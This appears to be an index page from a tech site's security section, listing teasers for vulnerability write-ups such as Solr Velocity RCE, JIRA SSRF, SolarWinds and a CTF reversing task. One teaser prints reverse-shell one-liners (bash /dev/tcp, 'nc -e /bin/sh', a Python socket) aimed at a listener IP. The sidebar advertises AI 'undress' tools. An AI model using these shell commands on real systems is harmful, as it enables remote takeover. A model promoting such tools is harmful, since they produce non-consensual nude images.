Community
Learn
Tools Library
AI Tools
Leisure
search
English
Article Tags
Home Technical Articles Operation and Maintenance Safety
Example analysis of Apache Solr velocity template injection RCE vulnerability

Example analysis of Apache Solr velocity template injection RCE vulnerability

0x01 Introduction Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through HttpGet operations and get returned results in XML format. 0x02 Vulnerability Introduction The VelocityResponseWriter component exists in Solr. An attacker can construct a specific request to modify the relevant configuration, so that the VelocityResponseWriter component allows loading of the specified template, which in turn leads to the Velocity template injection remote command execution vulnerability. The attacker exploits this

May 19, 2023 am 10:37 AM
Solr Velocity
Analysis of an example of using JIRA vulnerability to access the US military's unclassified Internet Protocol router network

Analysis of an example of using JIRA vulnerability to access the US military's unclassified Internet Protocol router network

The following describes how the author participated in the U.S. Department of Defense (DoD) Hack the Pentagon vulnerability public testing project and used the JIRA vulnerability CVE-2017-9506 to construct an SSRF attack surface and achieve access to the U.S. military's Non-Confidential Internet Protocol Router Network (NIPRnet), and Combined with other vulnerability techniques, a series of sensitive information of the DoD intranet system was obtained. Due to the confidential nature of the test process and content, this article only touches on this point without disclosing too many technical details and detailed scenarios. It is only for learning and sharing, and I hope readers will bear with me. JIRA is an excellent issue tracking and management software tool developed by the Australian company Atlassian. It can track and manage various types of issues.

May 18, 2023 pm 10:29 PM
jira
What are the types of SQL injection?

What are the types of SQL injection?

Preface SQL injection attack methods can be divided into explicit injection, error injection and blind injection based on the application processing the content returned by the database. Explicit injection attackers can directly obtain the content they want from the current interface content. The result returned by the error injection database query is not displayed on the page, but the application prints the database error information to the page, so the attacker can construct a database error statement and obtain the desired content from the error information. Blind injection database query results cannot be obtained from the intuitive page. The attacker obtains the desired content by using database logic or delaying the execution of the database library. Mysql manual injection combined injection?id=1'orderby4--

May 18, 2023 pm 10:05 PM
SQL
What are the rebound shells?

What are the rebound shells?

1.bash rebound bash-i>&/dev/tcp/ip_address/port0>&12.nc rebound nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

May 18, 2023 pm 10:01 PM
shell
How to use NSA's new APT framework DarkPulsar

How to use NSA's new APT framework DarkPulsar

Preface In March 2017, ShadowBrokers released a confidential document that shocked the world, including two frameworks: DanderSpritz and FuzzBunch. DanderSpritz is composed entirely of plugins and is used to gather intelligence, exploit vulnerabilities and manipulate taken over devices. It is written in Java and provides a graphical interface similar to the botnet management panel and a control panel similar to the Metasploit tool. It also incorporates backdoors and plugins for non-FuzzBunch controlled devices. DanderSprit Interface Overview Fuzzbunch provides a framework for different utilities to interact and work together, including various types of plug-ins.

May 18, 2023 pm 08:14 PM
nsa DarkPulsar
How to analyze the Ghostscript SAFER sandbox bypass vulnerability

How to analyze the Ghostscript SAFER sandbox bypass vulnerability

Preface Ghostscript is an interpreter software for Adobe PostScript language. It can draw in PostScript language and supports conversion between PS and PDF. Currently, it is installed by default in most Linux distributions and has been ported to Unix, MacOS, Windows and other platforms. Ghostscript is also used by programs such as ImagineMagic, PythonPIL and various PDF readers. Vulnerability description On August 21, Google security researcher Tavis Ormandy disclosed multiple GhostScript vulnerabilities. By constructing malicious PostScript scripts in images, you can bypass

May 18, 2023 pm 07:10 PM
ghostscript SAFER
DDCTF2019两个逆向分别是什么

DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

May 18, 2023 pm 05:13 PM
DDCTF writeup
Analysis of examples of bypassing restrictions and accessing Google's internal management systems

Analysis of examples of bypassing restrictions and accessing Google's internal management systems

One day, while digging for Google vulnerabilities, I discovered some IP addresses of Google's own services from public vulnerabilities. At first, I really didn't know what these IP addresses could do. I checked these IP addresses first and further discovered that they contained some of Google's internal IPs. I suddenly remembered that recently, my friend KLSREERAM reported a vulnerability related to Google's internal IP, and another friend Vishnu reported a vulnerability that used Google subdomains to access the control panel. Currently, both vulnerabilities have been fixed by Google, and the internal IP addresses related to these two vulnerabilities cannot be accessed from the Internet. But now, with several Google internal IP addresses in front of me, I have to find a way to see if I can

May 18, 2023 pm 03:19 PM
Google
How to implement vulnerability analysis of Disk Pulse Enterprise Window application

How to implement vulnerability analysis of Disk Pulse Enterprise Window application

1. Vulnerability Introduction DiskPulseEnterprise is a software that monitors disk changes. It can connect and manage the software through a management port 9120 or web management window 80 to monitor disk changes. There is a dynamic link library libspp.dll in DiskPulse Enterprise, which contains some functions responsible for HTTP operations. The problem occurs in this dynamic link library. When processing the post data, there is no strict length control on the post data, resulting in When executing the acquired data, it copies data to invalid memory, causing buffer overflow, triggering SEH abnormal behavior processing, and finally controlling EIP to execute arbitrary code. Software download link: h

May 18, 2023 pm 03:04 PM
window Disk Pulse Eneterprise
What is the main reason for APP crash?

What is the main reason for APP crash?

1. What kind of scenarios are likely to cause crash problems? Recently, I have been thinking about what kind of problems are likely to cause crashes - that is, having abnormal thinking. For example: I watched an American TV series called "The Rookie" just two days ago. "Police", there is a scene in which the protagonist John Nolan failed to stop the fugitive's car with a police car, causing the fugitive to escape. What is the connection between this scene and the test? First of all, normal people will avoid collisions with others when driving on the road. This is like the main process of testing a function, and they will not make random inputs; but the policeman is different. He will do whatever it takes to catch the fugitive. All methods, this is like abnormal thinking during the testing process, thinking about how to operate the function to make it difficult to use. Guide 1. Abnormal operations Various abnormal operations

May 18, 2023 pm 01:55 PM
App
What are the common techniques for MySQL database?

What are the common techniques for MySQL database?

1. How to choose the type of server? The meanings of each parameter in the MySQL server configuration window are as follows. [ServerConfigurationType] This option is used to set the type of server. Click the down button to the right of this option to see 3 options. The specific meanings of the three options are as follows: Development Machine: This option represents a typical personal desktop workstation. Assume that there are multiple desktop applications running on the machine. Configure the MySQL server to use minimal system resources. ServerMachine (server): This option represents the server. MySQL server can run together with other applications, such as FTP, ema

May 18, 2023 pm 01:29 PM
MySQL
Example Analysis of Security Risks of SolarWinds Supply Chain APT Attack Incident

Example Analysis of Security Risks of SolarWinds Supply Chain APT Attack Incident

Background On December 13, the top U.S. security company FireEye (Chinese name: Huoyan) released a report stating that it had discovered a global intrusion activity and named the organization UNC2452. The APT organization invaded the SolarWinds company, implanted malicious code in the SolarWindsOrion commercial software update package, and distributed it. FireEye called it SUNBURST malware. The backdoor contains the ability to transfer files, execute files, analyze the system, reboot the machine, and disable system services for the purpose of lateral movement and data theft. SolarWindsOrionPlatform is a powerful, scalable infrastructure monitoring and management platform for

May 18, 2023 pm 12:52 PM
apt solarwinds
Example analysis of vBulletin 5.x remote code execution vulnerability

Example analysis of vBulletin 5.x remote code execution vulnerability

Introduction to vBulletin components vBulletin is the global leader in forum and community publishing software. Its security, powerful management functions and speed, and its ability to serve more than 40,000 online communities are highly favored by customers. Many large forums have chosen vBulletin as their community. From the customer list displayed on the official website of vBulletin, we can know that the famous game production company EA, the famous game platform Steam, Japan's large multinational company Sony, and the United States NASA are all its customers. vBulletin is efficient, stable and safe. In China There are also many large customers, such as Hummingbird.com, 51 Group Buying, Ocean Tribe and other online forums with tens of thousands of people using vBull.

May 18, 2023 am 11:46 AM
vBulletin
Analysis of examples of Google fixing Chrome 0-day vulnerabilities under active attacks

Analysis of examples of Google fixing Chrome 0-day vulnerabilities under active attacks

Google released a Chrome update on the 25th to fix three security vulnerabilities, including a 0-day vulnerability that is being actively exploited. Details about these attacks and how the vulnerability was exploited against Chrome users have not been made public. The attacks were discovered on February 18 by Clement Lecigne, a member of Google's threat analysis team. The Google Threat Analysis Group is the department at Google that investigates and tracks groups of threat actors. Chrome version 80.0.3987.122 fixes the 0-day vulnerability. The update is available for Windows, Mac, and Linux users, but ChromeOS, iOS, and Android users

May 18, 2023 am 11:25 AM
Google Chrome 0-day

Hot tools Tags

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

What's New in Windows 11 KB5054979 & How to Fix Update Issues
4 weeks ago By DDD
How to fix KB5055523 fails to install in Windows 11?
3 weeks ago By DDD
How to fix KB5055518 fails to install in Windows 10?
3 weeks ago By DDD
Strength Levels for Every Enemy & Monster in R.E.P.O.
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Blue Prince: How To Get To The Basement
3 weeks ago By DDD
Show More

Hot Tools

vc9-vc14 (32+64 bit) runtime library collection (link below)

vc9-vc14 (32+64 bit) runtime library collection (link below)

Download the collection of runtime libraries required for phpStudy installation

VC9 32-bit

VC9 32-bit

VC9 32-bit phpstudy integrated installation environment runtime library

PHP programmer toolbox full version

PHP programmer toolbox full version

Programmer Toolbox v1.0 PHP Integrated Environment

VC11 32-bit

VC11 32-bit

VC11 32-bit phpstudy integrated installation environment runtime library

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Show More

Hot Topics

Where is the login entrance for gmail email?
7926
15
Java Tutorial
1652
14
CakePHP Tutorial
1411
52
Laravel Tutorial
1303
25
PHP Tutorial
1249
29
Show More